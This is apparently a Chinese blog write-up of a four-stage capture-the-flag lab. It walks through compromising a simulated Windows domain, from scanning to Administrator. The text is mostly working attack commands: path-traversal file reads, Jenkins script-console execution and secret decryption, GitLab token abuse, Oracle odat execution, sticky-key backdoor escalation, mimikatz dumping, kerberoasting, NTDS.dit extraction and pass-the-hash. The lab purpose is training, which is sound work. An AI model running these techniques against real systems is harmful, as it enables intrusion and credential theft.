参考文章
https://fushuling.com/index.php/2023/10/10/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7privilege/
https://blog.csdn.net/uuzeray/article/details/142372470
https://blog.csdn.net/weixin_63576152/article/details/133892513第一关
39.98.119.134
fscan扫
PS G:\tool\护网\工具打包> G:\tool\护网\工具打包\fscan322.exe -h 39.98.119.134
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.98.119.134:80 open
39.98.119.134:8080 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.119.134:8080 code:403 len:548 title:None
[*] WebTitle http://39.98.119.134 code:200 len:54689 title:XR SHOP
[+] PocScan http://39.98.119.134/www.zip poc-yaml-backup-file80存在源码泄露,8080是Jenkins,应该是代码审计读到Jenkins的密码
tools下的content-log.php
权限很高,直接能读出flag01
http://39.98.119.134/tools/content-log.php?logfile=../../../../../../../../../Users/Administrator/flag/flag01.txt
flag01: flag{10d14c20-1ad0-4ab4-96bb-91cdb1d3f063}提示:Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins,尝试读出密码
http://39.98.119.134/tools/content-log.php?logfile=C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword
admin/510235cf43f14e83b88a9f144199655b
打开就是脚本命令执行
println "net user zzdzz qwer1234@ /add".execute().text
println "net localgroup administrators zzdzz /add".execute().text直接rdp连
传fscan扫内网
C:\Users\zzdzz>C:\Users\zzdzz\Desktop\fscan322.exe -h 172.22.14.1/24 -o 1.txt
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
(icmp) Target 172.22.14.7 is alive
(icmp) Target 172.22.14.11 is alive
(icmp) Target 172.22.14.16 is alive
(icmp) Target 172.22.14.31 is alive
(icmp) Target 172.22.14.46 is alive
[*] Icmp alive hosts len is: 5
172.22.14.31:445 open
172.22.14.7:135 open
172.22.14.11:445 open
172.22.14.7:445 open
172.22.14.46:139 open
172.22.14.31:139 open
172.22.14.11:139 open
172.22.14.46:135 open
172.22.14.7:139 open
172.22.14.31:135 open
172.22.14.11:135 open
172.22.14.46:80 open
172.22.14.7:8080 open
172.22.14.31:1521 open
172.22.14.7:3306 open
172.22.14.46:445 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo
[*]172.22.14.7
[->]XR-JENKINS
[->]172.22.14.7
[*] NetInfo
[*]172.22.14.31
[->]XR-ORACLE
[->]172.22.14.31
[*] NetInfo
[*]172.22.14.11
[->]XR-DC
[->]172.22.14.11
[*] NetBios 172.22.14.31 WORKGROUP\XR-ORACLE
[*] NetBios 172.22.14.46 XIAORANG\XR-0923
[*] NetBios 172.22.14.11 [+] DC:XIAORANG\XR-DC
[*] NetInfo
[*]172.22.14.46
[->]XR-0923
[->]172.22.14.46
[*] WebTitle http://172.22.14.7:8080 code:403 len:548 title:None
[*] WebTitle http://172.22.14.16:8060 code:404 len:555 title:404 Not Found
[*] WebTitle http://172.22.14.16 code:302 len:99 title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle http://172.22.14.46 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.14.7 code:200 len:54603 title:XR SHOP
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab
[+] PocScan http://172.22.14.7/www.zip poc-yaml-backup-file172.22.14.7 本机,已最高权限
172.22.14.46 XR-0923
172.22.14.11 XR-DC 域控
172.22.14.31 XR-ORACLE
172.22.14.16 GitLab
vshell上线,搭隧道
第二关
提示:
管理员为 Jenkins 配置了 Gitlab,请尝试获取 Gitlab API Token,并最终获取 Gitlab 中的敏感仓库。获取敏感信息后,尝试连接至 Oracle 数据库,并获取 ORACLE 服务器控制权限。尝试找到这个Gitlab API Token
http://39.98.119.134:8080/manage/credentials/
检查即可看到明文
{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}回到脚本控制台获取对应的明文,获得gitlab PRIVATE-TOKEN
println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
glpat-7kD_qLH2PiQv_ywB9hz2GitLab信息泄露利用详见
proxychains4 curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects" |jq |grep "http_url_to_repo"
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/gitlab-instance-23352f48/Monitoring.git
在xradmin/ruoyi-admin/src/main/resources/application-druid.yml找到Oracle的账密
# 主库数据源
master:
url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
username: xradmin
password: fcMyE8t9E4XdsKf用odat打oracle
添加用户
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user zzdzz qwer1234@ /add'
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators zzdzz /add'
rdp连即可
flag02
flag02: flag{497df907-bd8e-4e8e-bd03-fe6856eae42b}第三关
提示:
攻击办公区内网,获取办公 PC 控制权限,并通过特权滥用提升至 SYSTEM 权限。
在之前git克隆时,发现账密本internal-secret/credentials.txt里找到XR-0923的账密
zhangshuai | wSbEajHzZs直接RDP连上46
权限很低,读不了flag,需要提权
查看当前用户权限
net user zhangshuai
zhangshuai是Remote Management Use组的,可以打winrm
proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZswhoami /priv
发现比RDP多了一个SeRestorePrivilege
粘滞键提权
ren C://windows/system32/sethc.exe C://windows/system32/sethc.bak
ren C://windows/system32/cmd.exe C://windows/system32/sethc.exe
回到rdp锁定用户,在登录处按5下shift触发粘滞键弹出cmd拿到SYSTEM
直接创建一个账户
net user zzdzz qwer1234@ /add
net localgroup administrators zzdzz /add
再次rdp
flag03: flag{01809899-c8fc-4c01-812f-0bf0bf9880f6}第四关
传个猕猴桃上去,以管理员权限运行导出哈希
有版本是不行的,很神奇,搞了2个2.2.0一个可以一个不行,反正就多试几个吧
privilege::debug
sekurlsa::logonpasswords
[00000003] Primary
* Username : XR-0923$
* Domain : XIAORANG
* NTLM : 764ce0d23a2706f8ce59c559702f6d37
* SHA1 : 1b4a558d371b26ed969becb5f7d68593f2bdb7c1打kerberoasting
proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':764ce0d23a2706f8ce59c559702f6d37' -dc-ip 172.22.14.11
proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':764ce0d23a2706f8ce59c559702f6d37' -dc-ip 172.22.14.11 -request-user tianjing
写入hash.txt,然后爆破
hashcat -a 0 -m 13100 hash.txt ../rockyou.txt
DPQSXSXgh2winrm连一下
proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2 whoami /priv查看用户权限,发现又多一个SeBackupPrivilege
谈谈域渗透中常见的可滥用权限及其应用场景(二)-腾讯云开发者社区-腾讯云
kali上新建一个raj.dsh
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:再用unix2dos将dsh文件的编码间距转换为Windows兼容的编码和间距
unix2dos raj.dsh在C:/下随便创个目录,上传raj.dsh
卷影拷贝
diskshadow /s raj.dsh
下载ntds.dit和system到kali上
RoboCopy /b z:\windows\ntds . ntds.dit
download ntds.dit
reg save HKLM\SYSTEM system
download system会用时比较久
解密出administrator的hash
impacket-secretsdump -ntds ntds.dit -system system local
70c39b547b7d8adec35ad7c09fb1d277打pth,winrm上去
proxychains4 evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"
type /Users/Administrator/flag/flag04.txt
flag04: flag{5a06fae0-cd1c-40fa-9ea6-06a89a04e4f6}
评论(已关闭)
评论已关闭